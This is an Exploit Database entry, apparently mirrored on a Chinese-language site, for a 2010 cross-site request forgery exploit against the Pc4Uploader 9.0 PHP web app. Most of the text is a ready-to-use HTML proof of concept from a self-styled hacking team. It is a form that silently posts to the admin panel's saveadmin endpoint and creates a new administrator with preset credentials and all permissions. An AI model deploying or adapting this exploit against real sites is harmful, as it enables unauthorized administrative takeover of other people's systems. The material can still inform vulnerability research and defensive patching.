Pc4Uploader 9.0 – Cross-Site Request Forgery

• Exploit Database
• 10 阅读

• 作者： RENO
  日期： 2010-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14819/

• # Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
  # TeaM : SauDi ViRuS TeaM
  # SiTe: WwW.Sa-ViRuS.CoM
  # Software Link: http://www.pc4arb.com/product-10.html
  
  <html>
  <title>[SvT]</title>
  <body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
  <p
   align="left"><font size="5" 
  color="#FFFFFF"><b>
   
   
  </b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin 
  Exploit<br>
  
  
  Author : RENO<br>
   
   TeaM : SauDi ViRuS TeaM<br>
   
  
  Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
   
  
  Email : R7e@HoTMaiL.coM</font></b></p>
  <p align="center"> </p>
  <p align="center"> </p>
  
  <svt>
  <center>
  
  <form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
  <input type="hidden" name="username" value="R3NO"/>
  <input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
  <input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>
  <input type="hidden" name="setting_rols" value="1"/>
  <input type="hidden" name="member_rols" value="1"/>
  <input type="hidden" name="files_rols" value="1"/>
  <input type="hidden" name="msg_rols" value="1"/>
  <input type="hidden" name="news_rols" value="1"/>
  <input type="hidden" name="advs_rols" value="1"/>
  <input type="hidden" name="links_rols" value="1"/>
  <input type="hidden" name="support_rols" value="1"/>
  <input type=submit value="Submit">
  </p>
  
  </form>
  </svt>
  
  
  </center>
  </html>